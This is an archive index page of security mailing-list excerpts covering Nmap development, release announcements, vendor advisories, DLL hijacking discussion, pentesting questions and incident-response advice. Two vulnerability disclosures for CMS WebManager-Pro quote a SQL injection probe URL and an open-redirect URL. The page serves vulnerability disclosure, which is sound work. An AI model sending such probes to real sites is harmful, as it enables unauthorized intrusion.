SecLists.Org Security Mailing List Archive

Any hacker will tell you that the latest news and exploits are not found on any web site—not even Insecure.Org. No, the cutting edge in security research is and will continue to be the full disclosure mailing lists such as Bugtraq. Here we provide web archives and RSS feeds (now including message extracts), updated in real-time, for many of our favorite lists. Browse the individual lists below, or search them all:

Insecure.Org Lists

Nmap Development — Unmoderated technical development forum for debating ideas, patches, and suggestions regarding proposed changes to Nmap and related projects.

[NSE] scan traceroute hops Henri Doreau (Sep 02)
Hello,

2010/8/28 David Fifield <david () bamsoftware com>

trivial, and of course relies upon the promising new target.add() feature.

Regards

Re: [Ncat] I'd like to contribute a feature miniBill (Sep 02)
2010/7/29 David Fifield <david () bamsoftware com>:

I've rapidly checked ncat_listen.c which is the file which, as far as
I could understand,
actually invokes the platform-specific calls. As it works now it
executes the command
every time someone connects. What I would like to do is to have one
single command
execution, which collects all the users' input, and whose output is
copied to every user.
As small as I can understand it, it won't...

Re: lua brocken in nse script Seth Graham (Sep 01)
Ok Patrick, I'll do it and I'll coment the results on this list.

Thks for your help and congrutalutions for the job in NSE ;),
Seth

2010/9/2 Patrick Donnelly <batrick () batbytes com>

Re: lua brocken in nse script Patrick Donnelly (Sep 01)
I don't see anything wrong with what you've done from here. Do the
following to see if this helps find the problem:

(1) Configure Nmap with --with-liblua=included. This will make Nmap
statically bind to Lua.

If the problem still occurs, turn Lua assertions on (keeping the above
change for static linking):

(2) Add "-DLUA_USE_APICHECK" to CFLAGS in nmap/liblua/Makefile.

Lua will catch most common errors this way.

Re: lua brocken in nse script Seth Graham (Sep 01)
Hi Patrick,

2010/9/1 Patrick Donnelly <batrick () batbytes com>

I saw from the output that you are using Gentoo. Are you using the

Yes, I use gentoo and for default my gcc CFLAGS optimizations are set to
-02, configuring nmap 5.21-r1 (with gentoo patches, I attach these) with lua
and ssl support and lua libaries dinamically.

With this optimizations compilation flags all my system is working fine (-02
is not so hard to break code...

Re: lua brocken in nse script Patrick Donnelly (Sep 01)
Hello Seth,

I'm unable to reproduce this problem. I suspect your Nmap is
configured/compiled improperly. Usually when there are GC segfaults it
results from two different Lua installations being linked to (usually
dynamic and static linking). Although, I find this unlikely
considering where the fault occurred.

I saw from the output that you are using Gentoo. Are you using the
installation provided by Gentoo or did you compile Nmap yourself? If...

lua brocken in nse script Seth Graham (Sep 01)
Hi to everybody,

I'm working in a litlle nse script to find proxys with method CONNECT
available. I've test it with some parameters contexts and it works fine,
but when it's working with a very large ip range it crash. I don't know if
it is a nse engine problem (with multithreading maybe?), a problem in my
litle script or in lua libraries.

I write you a Segfault debug to improbe some solution. Lets go.

==============================...

Re: rainmap - nmap wrapper for worker process alexandru (Sep 01)
Thanks for your patience, SVN r20063 should be what you need. The worker code is in src/celeryd and can be run as is on
the worker nodes, provided dependencies are met and with the one caveat that the web-app instance must also be a
RabbitMQ node, though it doesn't need to be involved in scanning.

More details in docs/INSTALL. I'm looking forward for feedback related to either the install doc/procedure, or patches
to make the code better....

Re: Adding new NSE discovered targets to Nmap Djalal Harouni (Aug 31)
Hi,

I've just merged my nmap-add-targets branch as r20044, so you can go
ahead and use the new NSE library target.lua to add new discovered targets.

Pls keep in mind that currently:
o By targets we mean targets specifications that are supported by Nmap
(hostnames, IP, networks etc).
o There is some target filtering but it is based on target specification
*strings*, and we only filter new targets that are added by NSE scripts,
Nmap targets are...

Re: nmap potentially vulnerable to Windows DLL Hijacking Rob Nicholls (Aug 31)
This is presumably similar to the Wireshark issue:

http://www.exploit-db.com/exploits/14721/
http://www.nessus.org/plugins/index.php?view=single&id=48943

I must admit I was surprised to hear that Nmap tries to load this file
as it's not one that's usually distributed with WinPcap (it's related to
AirPcap, a separate project from CACE Technologies). I presume we can do
something in Nmap to fix/workaround this issue (perhaps copy whatever
the...

nmap potentially vulnerable to Windows DLL Hijacking Nikhil Mittal (Aug 31)
Hi,

I was just checking nmap 5.21 for Windows DLL hijacking and it seems that nmap is searching for airpcap.dll in
"insufficient qualified path". If I force nmap to open a file from a network share it do try to load dll from that
share, it means it is vulnerable? correct me if wrong. I am unable to exploit the vulnerability because while accessing
airpcap.dll from network share I can see FAST IO Disallowed in procmon. I have no idea...

Re: Ncrack 0.2 Alpha - SSH behaviour ithilgore (Aug 31)
Hello Mike.
The Ncrack engine is built that way so that it initially increases the
number of parallel connections and then as it reaches the maximum capacity
of the server (as determined by closed connections or timeouts), it will
slowly decrease them before finally stabilizing.
Ncrack also uses a username/password pool where it places credentials that
weren't tested successfully (because the connection was prematurely closed
or whatever other...

Re: Ncrack 0.2 Alpha - SSH behaviour Robin Wood (Aug 31)
Oh well, there goes my theory!

I'll have a look at the ncrack throttling stuff, could be useful in my work.

Robin

RE: Ncrack 0.2 Alpha - SSH behaviour Mike Westmacott (Aug 31)
Hi Robin,
As I understand it nmap will attempt to determine what the maximum number of concurrent connections is when it starts
up, and will throttle back connections if it starts to see them being closed (according to debug). My issue here is
that I have two large files (I'm not saying it's down to size though!) - both which contain the correct password for
the user - and one of them will correctly identify the password, the other will not. I...

Re: NMAP hangs on MIPS Nuno Gonçalves (Aug 31)
2010/8/31 Nuno Gonçalves <nunojpg () gmail com>:

The problem is with the use of class std::nmap<port_spec,
service_node> service_table.

line 241: i = service_table.find(ps); takes 50% of the time.
line 274: service_table[ps] = sn; takes 45% of the time.

Any suggestions why is this so slow on MIPS? Do I need optimization flags?

Thanks,
Nuno

Nmap Hackers — Moderated list for the most important new releases and announcements regarding the Nmap Security Scanner and related projects. We recommend that all Nmap users subscribe.

Nmap Defcon Release: Version 5.35DC1 Fyodor (Jul 16)
Hi folks. It has been 3.5 months since the last Nmap release
(5.30BETA1 on March 29), and anyone following the nmap-dev list knows
that we've been very busy during that time. So I'm pleased to release
Nmap version 5.35DC1 containing the fruits of that labor. The Defcon
name is because that conference is awesome! And also because David
Fifield and I have an exciting Nmap talk planned there and at Black
Hat in a couple weeks (see...

Nmap News and Last Chance to Take the Survey Fyodor (Apr 30)
Hi Folks. I have some Nmap news to share with you:

First off, I'm delighted to introduce the 2010 Nmap/Google Summer of
Code Team! Google has sponsored eight student developers to spend
this summer enhancing the Nmap Security Scanner and related projects,
so you can expect great things in coming months. Ithilgore and Luis
MartinGarcia are returning to improve Ncrack and Nping, new students
Drazen Popovic and Djalal Harouni will be working on...

Survey Reminder Fyodor (Apr 14)
Hi folks, I have a quick question for you:

Q: What do the Nmap Scripting Engine, Ndiff, and the Zenmap Topology
Mapper have in common?

A: They're all features which were added after you asked for them in
the 2006 Nmap Survey!

With that in mind, I'd like to thank the 1,013 people who have already
taken the 2010 survey. We just need 1,987 more and we can close this
survey up, tabulate and share results, choose the prize winners, and
post...

Nmap/SecTools Survey and GSoC Deadline Fyodor (Apr 07)
Hello everyone. I hope you're enjoying the 5.30BETA1 release. So far
it has proven stable and functional, so don't let the BETA name scare
you. You can get it at http://nmap.org/download.html. Meanwhile, I
have some great news, and I'm also asking for your help on two things.

The first is that the Nmap Project was again accepted for the Google
Summer of Code program, so we'll have full time coding help this
summer! SoC previously brought us...

Nmap 5.30BETA1 Released w/37 new scripts and new Apple vuln Fyodor (Mar 29)
Hi folks! It has been two months since the 5.21 release and we've
been very busy during that time! I hope you're happy with the results,
which is a new 5.30BETA1 release made today. Top features include:

o 37 new NSE scripts, bringing the total to 117! New scripts cover
SNMP, SSL, Postgress, MySQL, HTTP, LDAP, NFS, DB2, AFS, and many
more. Also check out the clever host scripts qscan and
ipidseq. Learn about them all at...

Nmap 5.21 released Fyodor (Jan 27)
Hello everyone. I'm pleased to release Nmap 5.21, which contains zero
exciting new features! It is a bug-fix only release instead,
addressing about a dozen issues discovered since 5.20. Thanks for all
the testing and bug reports! None of the bugs are critical, but we
wanted to polish things up since 5.21 may be the latest stable version
for a while. That gives us time to tackle and stabilize big
development projects. If you want to know...

Lots of Nmap News Fyodor (Jan 22)
Hi folks. I'm happy to report that the 5.20 release went well. But
with this many improvements, there will always be a few bugs found.
We're planning to round those up with a bugfix-only 5.21 release next
week. So please test out 5.20 and report any problems you experience:

Download Page: http://nmap.org/download.html
Bug Report Instructions: http://nmap.org/book/man-bugs.html

If you're running from a build of the latest SVN checkout, you...

Nmap 5.20 Released Fyodor (Jan 20)
Happy new year, everyone. I'm happy to announce Nmap 5.20--our first
stable Nmap release since 5.00 last July! It offers more than 150
significant improvements, including:
o 30+ new Nmap Scripting Engine scripts
o enhanced performance and reduced memory consumption
o protocol-specific payloads for more effectie UDP scanning
o a completely rewritten traceroute engine
o massive OS and version detection DB updates (10,000+ signatures)

The...

Nmap 5.00 Released! Fyodor (Jul 16)
Hello everyone. I'm delighted to announce the release of Nmap 5.00!
This is the first major release since 4.50 in 2007, and includes about
600 significant changes since then! We consider this the most
important Nmap release since 1997, and we recommend that all current
users upgrade.

There are too many changes to list them all in this email, so here are
the top 5 improvements in Nmap 5:

1) The new Ncat tool aims to be your Swiss Army Knife...

Nmap news: stable release candidate 4.90RC1, SoC team, and new translations Fyodor (Jun 26)
Hi Folks. I'm pleased to announce some exciting Nmap news:

[=================Nmap 4.90RC1==================]

It has been nearly 10 months (and 11 dev releases) since 4.76, the
last stable Nmap release. And we've made many dramatic changes, so it
is time for a new stable version! I've posted a release
candidate--4.90RC1--on the Nmap download page:

http://nmap.org/download.html

Please test it out, and let us know if you find any problems...

Nmap 4.85BETA6 now avail w/Conficker detection Fyodor (Apr 01)
Hi Folks! In case you missed all the news reports yesterday, a couple
great researchers from the Honeynet Project (Tillmann Werner and Felix
Leder) and Dan Kaminsky came up with a way to remotely detect the
Conficker worm which has infected millions of machines worldwide.
Some say 15,000,000 machines infected, but that might just be
exaggerated AV-company BS for all I know. But there are clearly
millions of infections, and this massive botnet...

Nmap News: 4.84BETA4 release, Nmap book news, Summer of Code, Twitter, etc. Fyodor (Mar 27)
Hello everyone. We've seen 848 messages on nmap-dev this year, but
this is my first post to nmap-hackers. So I have a lot of exciting
Nmap news to fit into this one email!

[=================Nmap 4.85BETA4==================]

While the last release I posted to this list was 4.76 in September of
last year, we've had four beta releases since then with hundreds of
important and dramatic changes. I'm pretty happy with the latest
4.85BETA4 release,...

Other Excellent Security Lists

Bugtraq — The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!

Vulnerabilities in CMS WebManager-Pro MustLive (Sep 02)
Hello Bugtraq!

I want to warn you about SQL Injection and Redirector (URL Redirector Abuse)
vulnerabilities in CMS WebManager-Pro (SecurityVulns ID:11108). It's
Ukrainian commercial CMS.

SQL Injection:

http://site/c.php?id=1%20and%20version()=5

Redirector:

http://site/c.php?id=1&url=http://websecurity.com.ua

Affected products: both systems CMS WebManager-Pro from two developers.
Vulnerable are versions CMS WebManager-Pro up to 8.1...

{PRL} Novell Netware OpenSSH Remote Stack Overflow Francis Provencher (Sep 02)
#####################################################################################

Application: Novell Netware OpenSSH Remote Stack Overflow

Platforms: Netware 6.5

Exploitation: Remote code execution

CVE Number:

Novell TID: 7006756

ZeroDayInitiative: ZDI-10-169

Author: Francis Provencher (Protek Research Lab's)

Blog: http://www.protekresearchlab.com/...

Moovida Media Player version 2.0.0.15 Insecure DLL Hijacking Vulnerability (libc.dll,quserex.dll) YGN Ethical Hacker Group (Sep 02)
1. OVERVIEW

The Moovida Media Player application is vulnerable to Insecure DLL
Hijacking Vulnerability. Similar terms that describe this
vulnerability
have been come up with Remote Binary Planting, Unsafe Library Loading,
and Insecure DLL Loading/Injection/Hijacking/Preloading.

2. PRODUCT DESCRIPTION

Moovida Media Player is a free and open source media center that
allows you to enjoy all of your music, video and pictures
in an awsome...

[ MDVSA-2010:168 ] openssl security (Sep 02)
_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:168
http://www.mandriva.com/security/
_______________________________________________________________________

Package : openssl
Date : September 1, 2010
Affected: 2010.1
_______________________________________________________________________

Problem Description:

A vulnerability has been found...

[ MDVSA-2010:169 ] mozilla-thunderbird security (Sep 02)
_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:169
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mozilla-thunderbird
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2010.0, 2010.1
_______________________________________________________________________

Problem...

[USN-982-1] Wget vulnerability Marc Deslauriers (Sep 02)
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem...

XSS vulnerability in ArtGK CMS advisory (Sep 01)
Vulnerability ID: HTB22588
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_artgk_cms_1.html
Product: ArtGK CMS
Vendor: ArtGK ( http://artgk-cms.ru/ )
Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...

Online Binary Planting Exposure Test ACROS Lists (Sep 01)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.

URL: http://www.binaryplanting.com/test.htm

Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...

XSS vulnerability in Rumba CMS tags advisory (Sep 01)
Vulnerability ID: HTB22591
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_rumba_cms.html
Product: Rumba CMS
Vendor: Rumba Netware Ltd. ( http://rumbacms.com )
Vulnerable Version: 2.4 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking...

XSS vulnerability in ArtGK CMS forum advisory (Sep 01)
Vulnerability ID: HTB22587
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_artgk_cms.html
Product: ArtGK CMS
Vendor: ArtGK ( http://artgk-cms.ru/ )
Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...

XSS vulnerability in Rumba CMS advisory (Sep 01)
Vulnerability ID: HTB22592
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_rumba_cms_1.html
Product: Rumba CMS
Vendor: Rumba Netware Ltd. ( http://rumbacms.com )
Vulnerable Version: 2.4 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking &...

Tortoise SVN DLL Hijacking Vulnerability nikhil_uitrgpv (Sep 01)
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3199 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

XSS vulnerability in Amiro.CMS FAQ advisory (Sep 01)
Vulnerability ID: HTB22590
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_amiro_cms_1.html
Product: Amiro.CMS
Vendor: Amiro ( http://www.amiro.ru/ )
Vulnerable Version: 5.8.4.0 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...

VMSA-2010-0013 VMware ESX third party updates for Service Console VMware Security Team (Sep 01)
------------------------------------------------------------------------
VMware Security Advisory

Advisory ID: VMSA-2010-0013
Synopsis: VMware ESX third party updates for Service Console
Issue date: 2010-08-31
Updated on: 2010-08-31 (initial release of advisory)
CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
CVE-2010-1321 CVE-2010-1168 CVE-2010-1447...

VMSA-2010-0013 VMware Security Team (Sep 01)
------------------------------------------------------------------------
VMware Security Advisory

Advisory ID: VMSA-2010-0013
Synopsis: VMware ESX third party updates for Service Console
Issue date: 2010-08-31
Updated on: 2010-08-31 (initial release of advisory)
CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
CVE-2010-1321 CVE-2010-1168 CVE-2010-1447...

Full Disclosure — An unmoderated high-traffic forum for disclosure of security information. Fresh vulnerabilities sometimes hit this list many hours before they pass through the Bugtraq moderation queue. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. Unfortunately 80% of the posts are worthless drivel, so finding the gems takes patience.

[ MDVSA-2010:170 ] wget security (Sep 02)
_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:170
http://www.mandriva.com/security/
_______________________________________________________________________

Package : wget
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0,
Enterprise Server 5.0...

[ GLSA 201009-01 ] wxGTK: User-assisted execution of arbitrary code Alex Legler (Sep 02)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201009-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
Title: wxGTK: User-assisted execution of arbitrary code...

Re: DLL hijacking with Autorun on a USB drive coderman (Sep 02)
sir, you've got a Coyotos stuck in your mustache. what did you eat for lunch?

Re: DLL hijacking with Autorun on a USB drive coderman (Sep 02)
there are some useful mitigations around these inevitable failures,
http://qubes-os.org/Architecture.html is an example of isolation
rather than correctness i've liked since NetTop wrapped RSBAC policy
around vmware guest isolation...

defense in depth loves company, so application correctness, in
addition to NX / other hw protections on guest/host, in addition to
virtual machine isolation, in addition to RSBAC constraints, in
addition to ......

Re: DLL hijacking with Autorun on a USB drive Valdis . Kletnieks (Sep 02)
Yeah, but hacking a Harvard architecture is still balls harder than hacking
a von Neumann architecture. ;)

Bug in vde_plug, remote exploitation possible? halfdog (Sep 02)
Vde (virtual distributed ethernet) is an ethernet compliant virtual network that
can be spawned over a set of physical computers over the internet ... (see
http://vde.sourceforge.net).

The vde_plug (at least on ubuntu hardy) contains a bug, that is triggered when a
certain amount of encapsulated ether frame data is sent to the plug in a
specially timed manner. When the input buffer is filled just with a single byte,
vde_plug uses also the first...

Re: DLL hijacking with Autorun on a USB drive Pavel Kankovsky (Sep 02)
If your OS's security model "understands" programs and data belong in
different security domains then every instruction of code on your computer
is trusted to enforce that policy. Your line of defence goes through every
program and any bug can breach it. The failure is inevitable. [1]

[1] P. A. Loscocco, S. D. Smalley, P. A. Muckelbauer, R. C. Taylor,
S. J. Turner and J. F. Farrell, "The Inevitability of Failure: The Flawed...

Re: question regarding RSA Pavel Kankovsky (Sep 02)
You made general questions about RSA as a cryptographic primitive.
There was nothing about PKI in them.

RSA encryption uses public keys. Public keys are--as their name
suggests--supposed to be known publicly. Anyone can compute ciphertexts
from plaintexts. An encryption oracle will not help you crack RSA private
keys. If you can do it with the oracle, you can do it without the oracle
as well.

As far as encryption is concerned the purpose of...

Verizon Wireless security contact? auto666077 (Sep 02)
I'm looking for a Verizon Wireless security contact to report
somewhat minor security issues with their software. If you know
one, I'd appreciate it if you could reply to me with their contact
info.

[ MDVSA-2010:169 ] mozilla-thunderbird security (Sep 02)
_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:169
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mozilla-thunderbird
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2010.0, 2010.1
_______________________________________________________________________

Problem...

Re: DLL hijacking POC (failed, see for yourself) p8x (Sep 02)
Hi Christian,

I tested the POC here on Win 7 x64 ultimate fully updated and the issue
does work for me.

Vulnerabilities in CMS WebManager-Pro MustLive (Sep 02)
Hello Full-Disclosure!

I want to warn you about SQL Injection and Redirector (URL Redirector Abuse)
vulnerabilities in CMS WebManager-Pro (SecurityVulns ID:11108). It's
Ukrainian commercial CMS.

SQL Injection:

http://site/c.php?id=1%20and%20version()=5

Redirector:

http://site/c.php?id=1&url=http://websecurity.com.ua

Affected products: both systems CMS WebManager-Pro from two developers.
Vulnerable are versions CMS WebManager-Pro up to...

Re: DLL hijacking POC (failed, see for yourself) Jacky Jack (Sep 02)
http://support.microsoft.com/kb/2264107

This is just optional. Not mandatory patch update as far as I know.

[USN-982-1] Wget vulnerability Marc Deslauriers (Sep 02)
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem...

Re: DLL hijacking POC (failed, see for yourself) Larry Seltzer (Sep 02)
I don’t think you read my e-mail. They fixed it. Have you retested today?

*From:* Christian Sciberras [mailto:uuf6429 () gmail com]
*Sent:* Thursday, September 02, 2010 9:44 AM
*To:* Larry Seltzer
*Cc:* full-disclosure () lists grok org uk
*Subject:* Re: [Full-disclosure] DLL hijacking POC (failed, see for
yourself)

As I said at the very first email, the POC, even at it's best, doesn't work
on my 64bit system at all.

Regards,
Chris.

On Thu,...

Security Basics — A high-volume list which permits people to ask "stupid questions" without being derided as "n00bs". I recommend this list to network security newbies, but be sure to read Bugtraq and other lists as well.

Re: Is Outlook Anywhere secure? Andre Pawlowski (Sep 02)
After I searched a lot in the net about this topic I often found my
eMail in this list.

Now I have done my research and configuration to this topic and want to
give others a hint where to look. I wrote informations and
configurations about this topic in my blog (only in german)

http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html

So feel free to use it and feel free to ask if something bothers you....

using cvss to assess process problems robsonde (Sep 02)
our IT managers have ask that we use CVSS to assess security issues for the last few months.

we have quite a good understanding of the system when it is used for "bugs".

but we have a few security issues that are more of a failure of process, people doing the wrong thing and such like.

these risks don't fit the CVSS frame work at all, but at the same time we can see that they are security issues that
need to be assessed.

for...

Re: download by specified file type J. Bakshi (Sep 02)
wget -r -A "*.gif" http://www.test.com

-A >> accept

-r >> recursive download

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how
it benefits your company and how your customers can tell if a site is secure. You will find out...

Outlook anywhere exzactly (Aug 31)
Has anyone else seen implementations of Outlook Anywhere? Personally I think
its not needed and a security risk but I want to see what the community has
to say.

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how
it benefits your company and how...

download by specified file type who cat (Aug 31)
I wanna know how to use wget or curl to download the specified file ,
eg , download all the GIF file from the http://www.test.com
How can i achieve that?
Thanks!

All you best
------------------------
What we are struggling for ?
The life or the life ?

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who...

RE: RainbowCrack rainbow table generate Pete.LeMay (Aug 27)
Check out the tables at freerainbowtables.com. If those don't suit your needs, the forum has several discussions on
this question.

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of win.a
Sent: Wednesday, August 25, 2010 11:39 PM
To: security-basics () securityfocus com
Subject: RainbowCrack rainbow table generate

i want to user rainbowcrack to generate the rainbow table, but...

RainbowCrack rainbow table generate win.a (Aug 26)
i want to user rainbowcrack to generate the rainbow table,
but i don' how can i determine the parameter :
chain_len
chain_num
is there a way to calculate it ?Anyone any suggestions are appreciate.

All you best
------------------------
What we are struggling for ?
The life or the life ?

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we...

Re: security advice Erik (Aug 26)
Op 25-8-2010 9:14, Andrei Popescu schreef:

Hi,

Be warned! Usually it is never "only a counterstrike server". Do not
trust the box and reinstall. I've seen and investigated a hacked box
where it was thought to "only run a psybounce". It turned out a lot more
was happening but since the kernel was made to shut up about it, it
would not show the rest of the activities. It was a database server for
provisioning an ISP. A...

[HITB-Announce] HITB2010 SIGNINT Sessions Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...

RE: security advice Andrei Popescu (Aug 25)
Hello,
I had something like this also.. I still have all the files, but in
my case the "hacker" just runned a CounterStrike server on my box. I have
found the exploit in a website that I host, it was an oscommerce and it had
a security issue in the pictures folder.. don't know how he had access but
the thing is he managed to reinstall openssh and somehow he got the root
password (not change it, I saw him logging in the...

RE: security advice Grant, Richard (KYTC) (Aug 25)
Edmund I think you may need a different approach to Incident handling. We have experienced a couple compromised
servers. With over 3,000 servers physical and virtual we are too big of a target to miss forever. First the horse is
already out of the barn. Slamming the door shut will not change that.

This is a time for the Incident Handling Team to be called into action. This team would develop a plan for dealing
with the incident. Some of the...

Re: security advice debiantech (Aug 25)
Hi,

Although not the only way this can happen, I am willing to bet this
machine is not only an email server but a public web server. Not only
this but a guess is you are running some sort of CMS/CRM on that
webserver that uses PHP, possibly a web based email interface. If I have
been right so far, my first suggestion is to go to the home page for the
software and compare the version you have to the current stable version
and read the...

Re: security advice Robert Larsen (Aug 25)
Not knowing how you work makes your question hard to answer but a few
quick ones:
* Keep the system up to date (apt-get update && apt-get upgrade or similar)
* Install a host based intrusion detection system like Tripwire or AIDE
* Install a network based intrusion detection system like Snort
* Harden your installations with something like Bastille
* Run your system from a read-only filesystem and having only your mail
folders on writable...

Re: security advice Mike Razzell (Aug 25)
Maybe this is considered obvious to others of greater experience or
expertise in the field but doesn't the possibility exist that they
could look at all the logs and configurations and find no
vulnerability permitting a point of entry if a user with
administrative credentials logged in from a compromised client or
(less likely IMO) over an unsecured connection ie. plaintext. If this
is the case you could fix everything you find and still get...

RE: security advice Murda (Aug 25)
Hey Edmund,
First and foremost I will commend your honesty. Unfortunately, the fear of
reprimand can often cloud this area so much that people begin lying to cover
themselves; which then means that resolutions are harder to achieve. This
candour is exactly what is needed when investigating and responding to an
incident. Also make sure you document everything you did and do(as much as
is reasonable).

I think you would still benefit from having an...

Penetration Testing — While this list is intended for "professionals", participants frequenly disclose techniques and strategies that would be useful to anyone with a practical interest in security and network auditing.

Re: WAF Testing..suggestions?? bin4ry (Sep 01)
Hey False,

one thing you should keep in mind: While i was pentesting mod_security
and a bunch of commercial WAFs, i recognized that most of the products
work pretty well with popular assessment tools (w3af, etc.). They
detectedmost of the attacks. Afterwards i setup a vulnerable website
and tried to manually attack it. There was a huge difference: A lot of
manuall attacks were not recognized. I guess this is because most of
those WAF vendors try...

Re: WAF Testing..suggestions?? Yiannis Koukouras (Sep 01)
Hi False,

You can also try Http Parameter Pollution (HPP) attacks
http://www.securitytube.net/HTTP-Parameter-Pollution-%28HPP%29-Attack-video.aspx

Cheers,
Ioannis (Yiannis) Koukouras
CISSP, CISA, CISM
MSc in Computer Systems Security
BEng in Electronic Engineering
http://www.linkedin.com/in/ikoukouras
---
The information contained in this communication is intended solely
for the use of the individual or entity to whom it is addressed
and...

Re: Pentestn ASP website with tinymce Robin Wood (Sep 01)
Exploit DB is a good start:

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=tinymce&filter_author=&filter_platform=0&filter_type=0&filter_port=&filter_osvdb=&filter_cve=

And Security Focus

http://www.securityfocus.com/vulnerabilities

Its better than some of the native speakers!

Robin

------------------------------------------------------------------------
This list is...

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
- Bakkar: 1 Hr Talks
-...

Re: Pentestn ASP website with tinymce Justin Klein Keane (Sep 01)
Hello,

TinyMCE is a JavaScript based WYSIWYG editor, not a content management
system. TinyMCE can be configured to run independently of any dynamic
code, and doesn't present any security vulnerability by itself. TinyMCE
has had problems in the past with file manipulation that involved unsafe
dynamic scripting (such as PHP).

Justin Klein Keane, C|EH CEPT
http://www.MadIrish.net

Pentestn ASP website with tinymce Luana C. Rocha (Aug 31)
Hi,

The company whose i work for is in process evaluating a new website.
They are not concerned about security, but with how easy is to update
the website content.
At this moment the developer that is winning this evaluating is
proposing to use tinymce as a content manager.
I read about tinymce and I'm really concerned about our security.
Does anyone uses the tinymce? Can anyone point me a good way to pentest
this site and how to enforce...

RE: Pentest - ISA server Christopher M (Aug 31)
I've witnessed this sort of behavior when a Untangle box (www.untangle.com)
was in place in front of ISA acting as a unified threat management bridge.
It acts as a catch all for inbound traffic.

Christopher.

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of Ravipriya Thushara
Sent: Sunday, August 29, 2010 11:09 PM
To: Boyd, Chad
Cc: Kurt M. John; <pen-test () securityfocus...

Re: Pentest - ISA server Volker Tanger (Aug 30)
Greetings!

"Kurt M. John" <kurt.md.john () gmail com>:

What options did you use on NMAP?
By default it runs a SYN scan (-sS), and if the firewall or server
